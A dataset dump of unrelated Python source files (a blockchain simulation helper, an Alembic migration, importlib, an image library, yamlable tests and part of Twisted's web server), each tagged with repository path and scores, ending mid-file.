miker83z/cloud-chain
0
1847
import json import os from argparse import ArgumentTypeError from eth_typing import Address from web3.contract import Contract from settings import MIN_VAL, MAX_VAL, DEPLOYED_CONTRACTS, CONFIG_DIR async def init_simulation(contracts: [], factor: float, fn: str, status_init: bool) -> bool: statuses = [True] try: if status_init: for c in contracts: # Use different cloud_addresses for each contract instance cloud_address, cloud_status_ok = await c.cloud_sla_creation_activation() c.set_cloud_sla_address(cloud_address) statuses.append(cloud_status_ok) if fn == 'read' or fn == 'read_deny_lost_file_check' or fn == 'file_check_undeleted_file': statuses.append(await c.upload()) if fn == 'file_check_undeleted_file': statuses.append(await c.read()) if fn == 'corrupted_file_check': statuses.append(await c.another_file_upload_read()) if fn == 'delete': for _ in range(round(factor / DEPLOYED_CONTRACTS) + 1): statuses.append(await c.upload()) else: for c in contracts: if fn == 'delete': if c.tx_upload_count < round(factor / DEPLOYED_CONTRACTS) + 1: for _ in range(abs(c.tx_upload_count - (round(factor / DEPLOYED_CONTRACTS) + 1))): statuses.append(await c.upload()) except ValueError as v: print(f'{type(v)} [init_sim]: {v}') else: return check_statuses(statuses) def get_credentials(blockchain: str) -> tuple: if blockchain == 'polygon': from settings import ( polygon_private_keys ) return polygon_private_keys from settings import ( quorum_private_keys ) return quorum_private_keys def get_contract(w3, address: Address, compiled_contract_path: str) -> Contract: def get_abi(path: str) -> list: with open(path) as file: contract_json = json.load(file) contract_abi = contract_json['abi'] return contract_abi abi = get_abi(compiled_contract_path) contract = w3.eth.contract(address=address, abi=abi) return contract def check_statuses(statuses: []) -> bool: for idx in range(len(statuses)): if statuses[idx] == 0: return False return True def exists_mkdir(paths: []): for path in paths: if not os.path.exists(path): os.mkdir(path) def get_contracts_config(blockchain: str, msg: bool = True): if msg: print('Retrieve config file...') filename = f'{blockchain}.json' filepath = os.path.join(os.getcwd(), CONFIG_DIR, filename) with open(filepath) as file: contracts_summary = json.loads(file.read()) if msg: print(f'Config file retrieved at {filepath}.') return contracts_summary def range_limited_val(arg: str) -> int: """ Type function for argparse - int within some predefined bounds. """ try: s = int(arg) except ValueError: raise ArgumentTypeError("must be a int number") if s < MIN_VAL or s > MAX_VAL: raise ArgumentTypeError(f"argument must be > {str(MIN_VAL)} and < {str(MAX_VAL)}") return s
2.125
2
migrations/versions/816ea3631582_add_topics.py
OpenASL/HowSignBot
9
1848
"""add topics Revision ID: 816ea3631582 Revises: <KEY> Create Date: 2021-03-13 14:20:10.044131 """ from alembic import op import sqlalchemy as sa import bot # revision identifiers, used by Alembic. revision = "816ea3631582" down_revision = "<KEY>" branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table( "topics", sa.Column("content", sa.Text(), nullable=False), sa.Column("last_synced_at", bot.database.TIMESTAMP(timezone=True), nullable=True), sa.PrimaryKeyConstraint("content"), ) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_table("topics") # ### end Alembic commands ###
1.515625
2
src/Lib/importlib/__init__.py
NUS-ALSET/ace-react-redux-brython
1
1849
"""A pure Python implementation of import.""" __all__ = ['__import__', 'import_module', 'invalidate_caches'] # Bootstrap help ##################################################### # Until bootstrapping is complete, DO NOT import any modules that attempt # to import importlib._bootstrap (directly or indirectly). Since this # partially initialised package would be present in sys.modules, those # modules would get an uninitialised copy of the source version, instead # of a fully initialised version (either the frozen one or the one # initialised below if the frozen one is not available). import _imp # Just the builtin component, NOT the full Python module import sys from . import machinery from . import _bootstrap _bootstrap._setup(sys, _imp) # To simplify imports in test code _w_long = _bootstrap._w_long _r_long = _bootstrap._r_long # Fully bootstrapped at this point, import whatever you like, circular # dependencies and startup overhead minimisation permitting :) # Public API ######################################################### from ._bootstrap import __import__ def invalidate_caches(): """Call the invalidate_caches() method on all meta path finders stored in sys.meta_path (where implemented).""" for finder in sys.meta_path: if hasattr(finder, 'invalidate_caches'): finder.invalidate_caches() def find_loader(name, path=None): """Find the loader for the specified module. First, sys.modules is checked to see if the module was already imported. If so, then sys.modules[name].__loader__ is returned. If that happens to be set to None, then ValueError is raised. If the module is not in sys.modules, then sys.meta_path is searched for a suitable loader with the value of 'path' given to the finders. None is returned if no loader could be found. Dotted names do not have their parent packages implicitly imported. You will most likely need to explicitly import all parent packages in the proper order for a submodule to get the correct loader. """ try: loader = sys.modules[name].__loader__ if loader is None: raise ValueError('{}.__loader__ is None'.format(name)) else: return loader except KeyError: pass return _bootstrap._find_module(name, path) def import_module(name, package=None): """Import a module. The 'package' argument is required when performing a relative import. It specifies the package to use as the anchor point from which to resolve the relative import to an absolute import. """ level = 0 if name.startswith('.'): if not package: raise TypeError("relative imports require the 'package' argument") for character in name: if character != '.': break level += 1 return _bootstrap._gcd_import(name[level:], package, level) #need at least one import hook for importlib stuff to work. from . import basehook sys.meta_path.append(basehook.BaseHook())
2.484375
2
lib/arlunio/arlunio/image.py
swyddfa/stylo
0
1850
<gh_stars>0 from __future__ import annotations import base64 import io import logging import pathlib from typing import Optional # TODO: Remove these, as they should be contained in the numpy backend. import numpy as np import PIL.Image as PImage import arlunio.ast as ast import arlunio.color as color import arlunio.mask as mask import arlunio.math as math logger = logging.getLogger(__name__) class Image: """Our representation of an image, implemented as a wrapper around a standard Pillow image.""" def __init__(self, img: PImage.Image): self.img = img """The wrapped pillow image object.""" def __eq__(self, other): if not isinstance(other, Image): return False a = np.asarray(self.img) b = np.asarray(other.img) return (a == b).all() def __add__(self, other): if isinstance(other, Image): other = other.img if not isinstance(other, PImage.Image): raise TypeError("Addition is only supported between images.") img = self.copy() img.alpha_composite(other) return img @property def __array_interface__(self): # Ensure that our version of an image also plays nice with numpy. return self.img.__array_interface__ def _repr_png_(self): # Give nice previews in jupyter notebooks return self.img._repr_png_() @property def size(self): return self.img.size def alpha_composite(self, im, *args, **kwargs): """Composites an image onto this image. See :meth:`pillow:PIL.Image.Image.alpha_composite` """ if isinstance(im, Image): im = im.img self.img.alpha_composite(im, *args, **kwargs) def copy(self): """Return a copy of the image. See :meth:`pillow:PIL.Image.Image.copy` """ return Image(self.img.copy()) def paste(self, *args, **kwargs): """Paste another image into this image. See :meth:`pillow:PIL.Image.Image.paste` """ self.img.paste(*args, **kwargs) def save(self, *args, **kwargs): """Save the image with the given filename. See :meth:`pillow:PIL.Image.Image.save` """ self.img.save(*args, **kwargs) def thumbnail(self, *args, **kwargs): """Convert this image into a thumbail. See :meth:`pillow:PIL.Image.Image.thumbnail` """ self.img.thumbnail(*args, **kwargs) def new(color) -> Image: """Creates a new image with the given background color.""" return ast.Node.builtin(name="image", color=color) def fromarray(*args, **kwargs): """Create an image from an array See :func:`pillow:PIL.Image.fromarray` """ return Image(PImage.fromarray(*args, **kwargs)) def load(*args, **kwargs) -> Image: """Load an image from the given file. See :func:`pillow:PIL.Image.open` """ return Image(PImage.open(*args, **kwargs)) def save(image: Image, filename: str, mkdirs: bool = False) -> None: """Save an image in PNG format. :param filename: The filepath to save the image to. :param mkdirs: If true, make any parent directories """ path = pathlib.Path(filename) if not path.parent.exists() and mkdirs: path.parent.mkdir(parents=True) with open(filename, "wb") as f: image.save(f) def encode(image: Image) -> bytes: """Return the image encoded as a base64 string. Parameters ---------- image: The image to encode. Example ------- :: >>> import arlunio.image as image >>> img = image.new((8, 8), color='red') >>> image.encode(img) b'iVBORw0KGgoAAAANSUhEUgAAAAgAAAAICAYAAADED76LAAAAFklEQVR4nGP8z8DwnwEPYMInOXwUAAASWwIOH0pJXQAAAABJRU5ErkJggg==' """ with io.BytesIO() as byte_stream: image.save(byte_stream, "PNG") image_bytes = byte_stream.getvalue() return base64.b64encode(image_bytes) def decode(bytestring: bytes) -> Image: """Decode the image represented by the given bytestring into an image object. Parameters ---------- bytestring: The bytestring to decode. Example ------- .. arlunio-image:: Decode Example :include-code: :: import arlunio.image as image bytestring = b'iVBORw0KGgoAAAANSUhEUgAAAAgAAAAICAYAAADED76LAAAAFklEQVR4nGP8z8DwnwEPYMInOXwUAAASWwIOH0pJXQAAAABJRU5ErkJggg==' # noqa: E501 img = image.decode(bytestring) """ data = base64.b64decode(bytestring) bytes_ = io.BytesIO(data) return Image(load(bytes_)) def colorramp(values, start: Optional[str] = None, stop: Optional[str] = None) -> Image: """Given a 2d array of values, produce an image gradient based on them. .. arlunio-image:: Colorramp Demo :align: right :: import arlunio.image as image import arlunio.math as math import numpy as np cartesian = math.Cartesian() p = cartesian(width=256, height=256) x, y = p[:, :, 0], p[:, :, 1] values = np.sin(2*x*np.pi) * np.sin(2*y* np.pi) img = image.colorramp(values) First this function will scale the input array so that all values fall in the range :math:`[0, 1]`. It will then produce an image with the same dimensions as the original array. The color of each pixel will be chosen based on the corresponding value of the scaled array. - If the value is :math:`0` the color will be given by the :code:`start` parameter - If the value is :math:`1` the color will be given by the :code:`stop` parameter - Otherwise the color will be some mix between the two. Parameters ---------- values: The array of values used to decide on the color. start: The color to use for values near :math:`0` (default, :code:`black`) stop: The color to use for values near :math:`1` (default, :code:`white`) Examples -------- .. arlunio-image:: Colorramp Demo 2 :include-code: :: import arlunio.image as image import arlunio.math as math import numpy as np cartesian = math.Cartesian() p = cartesian(width=256, height=256) x = image.colorramp(p[:, :, 0], start="#0000", stop="#f007") y = image.colorramp(p[:, :, 1], start="#0000", stop="#00f7") img = x + y """ # Scale all the values so that they fall into the range [0, 1] minx = np.min(values) vs = np.array(values) - minx vs = vs / np.max(vs) if start is None: start = "black" if stop is None: stop = "white" start = color.getcolor(start, "RGBA") stop = color.getcolor(stop, "RGBA") funcs = [math.lerp(a, b) for a, b in zip(start, stop)] channels = [np.floor(func(vs)) for func in funcs] pixels = np.array(np.dstack(channels), dtype=np.uint8) return fromarray(pixels) def fill( region, foreground: Optional[str] = None, background: Optional[str] = None, image: Optional[Image] = None, ) -> Image: """Apply color to an image, as specified by a mask. Parameters ---------- mask: The mask that selects the region to be coloured foreground: A string representation of the color to use, this can be in any format that is supported by the :mod:`pillow:PIL.ImageColor` module. If omitted this will default to black. background: In the case where an existing image is not provided this parameter can be used to set the background color of the generated image. This can be any string that is accepted by the :mod:`pillow:PIL.ImageColor` module. If omitted this will default to transparent image: The image to color in, if omitted a blank image will be used. Example -------- .. arlunio-image:: Fill Demo :include-code: :: import arlunio.image as image import arlunio.shape as shape circle = shape.Circle(x0=-0.5, y0=0.25, r=0.6) img = image.fill(circle(width=512, height=256), foreground='red') circle.x0, circle.y0 = 0, 0 img = image.fill(circle(width=512, height=256), foreground='#0f0', image=img) circle.x0, circle.y0 = 0.5, -0.25 img = image.fill(circle(width=512, height=256), foreground='blue', image=img) """ foreground = "#000" if foreground is None else foreground fill_color = color.getcolor(foreground, "RGBA") if image is None: background = "#0000" if background is None else background image = new(color=background) if not isinstance(region, ast.Node): region = region() return ast.Node.fill(image, region, fill_color)
2.265625
2
yamlable/tests/test_yamlable.py
smarie/python-yamlable
27
1851
from copy import copy try: # Python 2 only: from StringIO import StringIO # create a variant that can serve as a context manager class StringIO(StringIO): def __enter__(self): return self def __exit__(self, exception_type, exception_value, traceback): self.close() except ImportError: from io import StringIO try: # python 3.5+ from typing import Dict, Any from yamlable import Y except ImportError: pass import pytest from yaml import dump, load from yamlable import YamlAble, yaml_info def test_yamlable_incomplete_description(): """ Tests that if __yaml_tag_suffix__ is not provided a YamlAble subclass cannot be declared """ with pytest.raises(NotImplementedError) as err_info: class Foo(YamlAble): # __yaml_tag_suffix__ = 'foo' def __to_yaml_dict__(self): # type: (...) -> Dict[str, Any] return copy(vars(self)) @classmethod def __from_yaml_dict__(cls, # type: Type[Y] dct, # type: Dict[str, Any] yaml_tag # type: str ): # type: (...) -> Y return Foo(**dct) # instantiate f = Foo() # dump f.dumps_yaml() assert "does not seem to have a non-None '__yaml_tag_suffix__' field" in str(err_info.value) def test_yamlable(): """ Tests that YamlAble works correctly """ @yaml_info(yaml_tag_ns='yaml.tests') class Foo(YamlAble): # __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info def __init__(self, a, b): self.a = a self.b = b def __eq__(self, other): return vars(self) == vars(other) def __to_yaml_dict__(self): # type: (...) -> Dict[str, Any] return copy(vars(self)) @classmethod def __from_yaml_dict__(cls, # type: Type[Y] dct, # type: Dict[str, Any] yaml_tag # type: str ): # type: (...) -> Y return Foo(**dct) # instantiate f = Foo(1, 'hello') # note: # dump y = f.dumps_yaml(default_flow_style=False) assert y == """!yamlable/yaml.tests.Foo a: 1 b: hello """ # dump io class MemorizingStringIO(StringIO): """ A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """ def close(self): self.value = self.getvalue() # super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one) StringIO.close(self) s = MemorizingStringIO() f.dump_yaml(s, default_flow_style=False) assert s.value == y # dump pyyaml assert dump(f, default_flow_style=False) == y # load assert f == Foo.loads_yaml(y) # load io assert f == Foo.load_yaml(StringIO(y)) # load pyyaml assert f == load(y) def test_yamlable_legacy_method_names(): """ Tests that YamlAbleMixIn works correctly """ global enc global dec enc, dec = False, False @yaml_info(yaml_tag_ns='yaml.tests') class FooLegacy(YamlAble): # __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info def __init__(self, a, b): self.a = a self.b = b def __eq__(self, other): return vars(self) == vars(other) def to_yaml_dict(self): # type: (...) -> Dict[str, Any] global enc enc = True return copy(vars(self)) @classmethod def from_yaml_dict(cls, # type: Type[Y] dct, # type: Dict[str, Any] yaml_tag # type: str ): # type: (...) -> Y global dec dec = True return FooLegacy(**dct) # instantiate f = FooLegacy(1, 'hello') # dump y = f.dumps_yaml(default_flow_style=False) assert y == """!yamlable/yaml.tests.FooLegacy a: 1 b: hello """ # dump io class MemorizingStringIO(StringIO): """ A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """ def close(self): self.value = self.getvalue() # super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one) StringIO.close(self) s = MemorizingStringIO() f.dump_yaml(s, default_flow_style=False) assert s.value == y # dump pyyaml assert dump(f, default_flow_style=False) == y # load assert f == FooLegacy.loads_yaml(y) # load io assert f == FooLegacy.load_yaml(StringIO(y)) # load pyyaml assert f == load(y) assert enc assert dec # TODO override so that tag is not supported, to check error message def test_yamlable_not_supported(): @yaml_info(yaml_tag_ns='yaml.tests') class Foo_Err(YamlAble): # __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info def __init__(self, a, b): self.a = a self.b = b def __eq__(self, other): return vars(self) == vars(other) def __to_yaml_dict__(self): # type: (...) -> Dict[str, Any] return copy(vars(self)) @classmethod def __from_yaml_dict__(cls, # type: Type[Y] dct, # type: Dict[str, Any] yaml_tag # type: str ): # type: (...) -> Y return Foo_Err(**dct) @classmethod def is_yaml_tag_supported(cls, yaml_tag # type: str ): # type: (...) -> bool # ALWAYS return false return False with pytest.raises(TypeError) as err_info: Foo_Err.loads_yaml("!yamlable/yaml.tests.Foo_Err {a: 1, b: hello}\n") assert "No YamlAble subclass found able to decode object" in str(err_info.value) def test_yamlable_default_impl(): """ tests that the default implementation works """ @yaml_info(yaml_tag_ns='yaml.tests') class Foo_Default(YamlAble): def __init__(self, a, b): self.a = a self.b = b f = Foo_Default(1, 'hello') s = """!yamlable/yaml.tests.Foo_Default a: 1 b: hello """ assert dump(f, default_flow_style=False) == s assert dump(load(dump(load(s))), default_flow_style=False) == s def test_help_yaml_info(): @yaml_info("com.example.MyFoo") class Foo(YamlAble): pass assert Foo.__yaml_tag_suffix__ == "com.example.MyFoo" @yaml_info(yaml_tag_ns="com.example") class Foo(YamlAble): pass assert Foo.__yaml_tag_suffix__ == "com.example.Foo" assert Foo().dumps_yaml() == """!yamlable/com.example.Foo {} """ def test_abstract_parent_error(): """This tests that we can define an abstract parent class with the YamlAble behaviour and inherit it""" class AbstractFooE(YamlAble): pass class FooError(AbstractFooE): """ This class inherits from the parent without redefining a yaml tag """ def __init__(self, a, b): self.a = a self.b = b def __eq__(self, other): return vars(self) == vars(other) # instantiate e = FooError(1, 'hello') # dump with pytest.raises(NotImplementedError): e.dumps_yaml() def test_abstract_parent(): """This tests that we can define an abstract parent class with the YamlAble behaviour and inherit it""" class AbstractFooV(YamlAble): pass @yaml_info(yaml_tag_ns='yaml.tests') class FooValid(AbstractFooV): def __init__(self, a, b): self.a = a self.b = b def __eq__(self, other): return vars(self) == vars(other) # instantiate f = FooValid(1, 'hello') # note: # dump y = f.dumps_yaml(default_flow_style=False) assert y == """!yamlable/yaml.tests.FooValid a: 1 b: hello """ # dump io class MemorizingStringIO(StringIO): """ A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """ def close(self): self.value = self.getvalue() # super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one) StringIO.close(self) s = MemorizingStringIO() f.dump_yaml(s, default_flow_style=False) assert s.value == y # dump pyyaml assert dump(f, default_flow_style=False) == y # load assert f == FooValid.loads_yaml(y) # load io assert f == FooValid.load_yaml(StringIO(y)) # load pyyaml assert f == load(y)
2.203125
2
src/twisted/web/server.py
vmario/twisted
0
1852
# -*- test-case-name: twisted.web.test.test_web -*- # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ This is a web server which integrates with the twisted.internet infrastructure. @var NOT_DONE_YET: A token value which L{twisted.web.resource.IResource.render} implementations can return to indicate that the application will later call C{.write} and C{.finish} to complete the request, and that the HTTP connection should be left open. @type NOT_DONE_YET: Opaque; do not depend on any particular type for this value. """ import copy import os import re from html import escape from typing import List, Optional from urllib.parse import quote as _quote import zlib from binascii import hexlify from zope.interface import implementer from twisted.python.compat import networkString, nativeString from twisted.spread.pb import Copyable, ViewPoint from twisted.internet import address, interfaces from twisted.internet.error import AlreadyCalled, AlreadyCancelled from twisted.web import iweb, http, util from twisted.web.http import unquote from twisted.python import reflect, failure, components from twisted import copyright from twisted.web import resource from twisted.web.error import UnsupportedMethod from incremental import Version from twisted.python.deprecate import deprecatedModuleAttribute from twisted.logger import Logger NOT_DONE_YET = 1 __all__ = [ "supportedMethods", "Request", "Session", "Site", "version", "NOT_DONE_YET", "GzipEncoderFactory", ] # backwards compatibility deprecatedModuleAttribute( Version("Twisted", 12, 1, 0), "Please use twisted.web.http.datetimeToString instead", "twisted.web.server", "date_time_string", ) deprecatedModuleAttribute( Version("Twisted", 12, 1, 0), "Please use twisted.web.http.stringToDatetime instead", "twisted.web.server", "string_date_time", ) date_time_string = http.datetimeToString string_date_time = http.stringToDatetime # Support for other methods may be implemented on a per-resource basis. supportedMethods = (b"GET", b"HEAD", b"POST") def quote(string, *args, **kwargs): return _quote(string.decode("charmap"), *args, **kwargs).encode("charmap") def _addressToTuple(addr): if isinstance(addr, address.IPv4Address): return ("INET", addr.host, addr.port) elif isinstance(addr, address.UNIXAddress): return ("UNIX", addr.name) else: return tuple(addr) @implementer(iweb.IRequest) class Request(Copyable, http.Request, components.Componentized): """ An HTTP request. @ivar defaultContentType: A L{bytes} giving the default I{Content-Type} value to send in responses if no other value is set. L{None} disables the default. @ivar _insecureSession: The L{Session} object representing state that will be transmitted over plain-text HTTP. @ivar _secureSession: The L{Session} object representing the state that will be transmitted only over HTTPS. """ defaultContentType = b"text/html" site = None appRootURL = None prepath: Optional[List[bytes]] = None postpath: Optional[List[bytes]] = None __pychecker__ = "unusednames=issuer" _inFakeHead = False _encoder = None _log = Logger() def __init__(self, *args, **kw): http.Request.__init__(self, *args, **kw) components.Componentized.__init__(self) def getStateToCopyFor(self, issuer): x = self.__dict__.copy() del x["transport"] # XXX refactor this attribute out; it's from protocol # del x['server'] del x["channel"] del x["content"] del x["site"] self.content.seek(0, 0) x["content_data"] = self.content.read() x["remote"] = ViewPoint(issuer, self) # Address objects aren't jellyable x["host"] = _addressToTuple(x["host"]) x["client"] = _addressToTuple(x["client"]) # Header objects also aren't jellyable. x["requestHeaders"] = list(x["requestHeaders"].getAllRawHeaders()) return x # HTML generation helpers def sibLink(self, name): """ Return the text that links to a sibling of the requested resource. @param name: The sibling resource @type name: C{bytes} @return: A relative URL. @rtype: C{bytes} """ if self.postpath: return (len(self.postpath) * b"../") + name else: return name def childLink(self, name): """ Return the text that links to a child of the requested resource. @param name: The child resource @type name: C{bytes} @return: A relative URL. @rtype: C{bytes} """ lpp = len(self.postpath) if lpp > 1: return ((lpp - 1) * b"../") + name elif lpp == 1: return name else: # lpp == 0 if len(self.prepath) and self.prepath[-1]: return self.prepath[-1] + b"/" + name else: return name def gotLength(self, length): """ Called when HTTP channel got length of content in this request. This method is not intended for users. @param length: The length of the request body, as indicated by the request headers. L{None} if the request headers do not indicate a length. """ try: getContentFile = self.channel.site.getContentFile except AttributeError: http.Request.gotLength(self, length) else: self.content = getContentFile(length) def process(self): """ Process a request. Find the addressed resource in this request's L{Site}, and call L{self.render()<Request.render()>} with it. @see: L{Site.getResourceFor()} """ # get site from channel self.site = self.channel.site # set various default headers self.setHeader(b"server", version) self.setHeader(b"date", http.datetimeToString()) # Resource Identification self.prepath = [] self.postpath = list(map(unquote, self.path[1:].split(b"/"))) # Short-circuit for requests whose path is '*'. if self.path == b"*": self._handleStar() return try: resrc = self.site.getResourceFor(self) if resource._IEncodingResource.providedBy(resrc): encoder = resrc.getEncoder(self) if encoder is not None: self._encoder = encoder self.render(resrc) except BaseException: self.processingFailed(failure.Failure()) def write(self, data): """ Write data to the transport (if not responding to a HEAD request). @param data: A string to write to the response. @type data: L{bytes} """ if not self.startedWriting: # Before doing the first write, check to see if a default # Content-Type header should be supplied. We omit it on # NOT_MODIFIED and NO_CONTENT responses. We also omit it if there # is a Content-Length header set to 0, as empty bodies don't need # a content-type. needsCT = self.code not in (http.NOT_MODIFIED, http.NO_CONTENT) contentType = self.responseHeaders.getRawHeaders(b"content-type") contentLength = self.responseHeaders.getRawHeaders(b"content-length") contentLengthZero = contentLength and (contentLength[0] == b"0") if ( needsCT and contentType is None and self.defaultContentType is not None and not contentLengthZero ): self.responseHeaders.setRawHeaders( b"content-type", [self.defaultContentType] ) # Only let the write happen if we're not generating a HEAD response by # faking out the request method. Note, if we are doing that, # startedWriting will never be true, and the above logic may run # multiple times. It will only actually change the responseHeaders # once though, so it's still okay. if not self._inFakeHead: if self._encoder: data = self._encoder.encode(data) http.Request.write(self, data) def finish(self): """ Override C{http.Request.finish} for possible encoding. """ if self._encoder: data = self._encoder.finish() if data: http.Request.write(self, data) return http.Request.finish(self) def render(self, resrc): """ Ask a resource to render itself. If the resource does not support the requested method, generate a C{NOT IMPLEMENTED} or C{NOT ALLOWED} response. @param resrc: The resource to render. @type resrc: L{twisted.web.resource.IResource} @see: L{IResource.render()<twisted.web.resource.IResource.render()>} """ try: body = resrc.render(self) except UnsupportedMethod as e: allowedMethods = e.allowedMethods if (self.method == b"HEAD") and (b"GET" in allowedMethods): # We must support HEAD (RFC 2616, 5.1.1). If the # resource doesn't, fake it by giving the resource # a 'GET' request and then return only the headers, # not the body. self._log.info( "Using GET to fake a HEAD request for {resrc}", resrc=resrc ) self.method = b"GET" self._inFakeHead = True body = resrc.render(self) if body is NOT_DONE_YET: self._log.info( "Tried to fake a HEAD request for {resrc}, but " "it got away from me.", resrc=resrc, ) # Oh well, I guess we won't include the content length. else: self.setHeader(b"content-length", b"%d" % (len(body),)) self._inFakeHead = False self.method = b"HEAD" self.write(b"") self.finish() return if self.method in (supportedMethods): # We MUST include an Allow header # (RFC 2616, 10.4.6 and 14.7) self.setHeader(b"Allow", b", ".join(allowedMethods)) s = ( """Your browser approached me (at %(URI)s) with""" """ the method "%(method)s". I only allow""" """ the method%(plural)s %(allowed)s here.""" % { "URI": escape(nativeString(self.uri)), "method": nativeString(self.method), "plural": ((len(allowedMethods) > 1) and "s") or "", "allowed": ", ".join([nativeString(x) for x in allowedMethods]), } ) epage = resource.ErrorPage(http.NOT_ALLOWED, "Method Not Allowed", s) body = epage.render(self) else: epage = resource.ErrorPage( http.NOT_IMPLEMENTED, "Huh?", "I don't know how to treat a %s request." % (escape(self.method.decode("charmap")),), ) body = epage.render(self) # end except UnsupportedMethod if body is NOT_DONE_YET: return if not isinstance(body, bytes): body = resource.ErrorPage( http.INTERNAL_SERVER_ERROR, "Request did not return bytes", "Request: " + util._PRE(reflect.safe_repr(self)) + "<br />" + "Resource: " + util._PRE(reflect.safe_repr(resrc)) + "<br />" + "Value: " + util._PRE(reflect.safe_repr(body)), ).render(self) if self.method == b"HEAD": if len(body) > 0: # This is a Bad Thing (RFC 2616, 9.4) self._log.info( "Warning: HEAD request {slf} for resource {resrc} is" " returning a message body. I think I'll eat it.", slf=self, resrc=resrc, ) self.setHeader(b"content-length", b"%d" % (len(body),)) self.write(b"") else: self.setHeader(b"content-length", b"%d" % (len(body),)) self.write(body) self.finish() def processingFailed(self, reason): """ Finish this request with an indication that processing failed and possibly display a traceback. @param reason: Reason this request has failed. @type reason: L{twisted.python.failure.Failure} @return: The reason passed to this method. @rtype: L{twisted.python.failure.Failure} """ self._log.failure("", failure=reason) if self.site.displayTracebacks: body = ( b"<html><head><title>web.Server Traceback" b" (most recent call last)</title></head>" b"<body><b>web.Server Traceback" b" (most recent call last):</b>\n\n" + util.formatFailure(reason) + b"\n\n</body></html>\n" ) else: body = ( b"<html><head><title>Processing Failed" b"</title></head><body>" b"<b>Processing Failed</b></body></html>" ) self.setResponseCode(http.INTERNAL_SERVER_ERROR) self.setHeader(b"content-type", b"text/html") self.setHeader(b"content-length", b"%d" % (len(body),)) self.write(body) self.finish() return reason def view_write(self, issuer, data): """Remote version of write; same interface.""" self.write(data) def view_finish(self, issuer): """Remote version of finish; same interface.""" self.finish() def view_addCookie(self, issuer, k, v, **kwargs): """Remote version of addCookie; same interface.""" self.addCookie(k, v, **kwargs) def view_setHeader(self, issuer, k, v): """Remote version of setHeader; same interface.""" self.setHeader(k, v) def view_setLastModified(self, issuer, when): """Remote version of setLastModified; same interface.""" self.setLastModified(when) def view_setETag(self, issuer, tag): """Remote version of setETag; same interface.""" self.setETag(tag) def view_setResponseCode(self, issuer, code, message=None): """ Remote version of setResponseCode; same interface. """ self.setResponseCode(code, message) def view_registerProducer(self, issuer, producer, streaming): """Remote version of registerProducer; same interface. (requires a remote producer.) """ self.registerProducer(_RemoteProducerWrapper(producer), streaming) def view_unregisterProducer(self, issuer): self.unregisterProducer() ### these calls remain local _secureSession = None _insecureSession = None @property def session(self): """ If a session has already been created or looked up with L{Request.getSession}, this will return that object. (This will always be the session that matches the security of the request; so if C{forceNotSecure} is used on a secure request, this will not return that session.) @return: the session attribute @rtype: L{Session} or L{None} """ if self.isSecure(): return self._secureSession else: return self._insecureSession def getSession(self, sessionInterface=None, forceNotSecure=False): """ Check if there is a session cookie, and if not, create it. By default, the cookie with be secure for HTTPS requests and not secure for HTTP requests. If for some reason you need access to the insecure cookie from a secure request you can set C{forceNotSecure = True}. @param forceNotSecure: Should we retrieve a session that will be transmitted over HTTP, even if this L{Request} was delivered over HTTPS? @type forceNotSecure: L{bool} """ # Make sure we aren't creating a secure session on a non-secure page secure = self.isSecure() and not forceNotSecure if not secure: cookieString = b"TWISTED_SESSION" sessionAttribute = "_insecureSession" else: cookieString = b"TWISTED_SECURE_SESSION" sessionAttribute = "_secureSession" session = getattr(self, sessionAttribute) if session is not None: # We have a previously created session. try: # Refresh the session, to keep it alive. session.touch() except (AlreadyCalled, AlreadyCancelled): # Session has already expired. session = None if session is None: # No session was created yet for this request. cookiename = b"_".join([cookieString] + self.sitepath) sessionCookie = self.getCookie(cookiename) if sessionCookie: try: session = self.site.getSession(sessionCookie) except KeyError: pass # if it still hasn't been set, fix it up. if not session: session = self.site.makeSession() self.addCookie(cookiename, session.uid, path=b"/", secure=secure) setattr(self, sessionAttribute, session) if sessionInterface: return session.getComponent(sessionInterface) return session def _prePathURL(self, prepath): port = self.getHost().port if self.isSecure(): default = 443 else: default = 80 if port == default: hostport = "" else: hostport = ":%d" % port prefix = networkString( "http%s://%s%s/" % ( self.isSecure() and "s" or "", nativeString(self.getRequestHostname()), hostport, ) ) path = b"/".join([quote(segment, safe=b"") for segment in prepath]) return prefix + path def prePathURL(self): return self._prePathURL(self.prepath) def URLPath(self): from twisted.python import urlpath return urlpath.URLPath.fromRequest(self) def rememberRootURL(self): """ Remember the currently-processed part of the URL for later recalling. """ url = self._prePathURL(self.prepath[:-1]) self.appRootURL = url def getRootURL(self): """ Get a previously-remembered URL. @return: An absolute URL. @rtype: L{bytes} """ return self.appRootURL def _handleStar(self): """ Handle receiving a request whose path is '*'. RFC 7231 defines an OPTIONS * request as being something that a client can send as a low-effort way to probe server capabilities or readiness. Rather than bother the user with this, we simply fast-path it back to an empty 200 OK. Any non-OPTIONS verb gets a 405 Method Not Allowed telling the client they can only use OPTIONS. """ if self.method == b"OPTIONS": self.setResponseCode(http.OK) else: self.setResponseCode(http.NOT_ALLOWED) self.setHeader(b"Allow", b"OPTIONS") # RFC 7231 says we MUST set content-length 0 when responding to this # with no body. self.setHeader(b"Content-Length", b"0") self.finish() @implementer(iweb._IRequestEncoderFactory) class GzipEncoderFactory: """ @cvar compressLevel: The compression level used by the compressor, default to 9 (highest). @since: 12.3 """ _gzipCheckRegex = re.compile(br"(:?^|[\s,])gzip(:?$|[\s,])") compressLevel = 9 def encoderForRequest(self, request): """ Check the headers if the client accepts gzip encoding, and encodes the request if so. """ acceptHeaders = b",".join( request.requestHeaders.getRawHeaders(b"accept-encoding", []) ) if self._gzipCheckRegex.search(acceptHeaders): encoding = request.responseHeaders.getRawHeaders(b"content-encoding") if encoding: encoding = b",".join(encoding + [b"gzip"]) else: encoding = b"gzip" request.responseHeaders.setRawHeaders(b"content-encoding", [encoding]) return _GzipEncoder(self.compressLevel, request) @implementer(iweb._IRequestEncoder) class _GzipEncoder: """ An encoder which supports gzip. @ivar _zlibCompressor: The zlib compressor 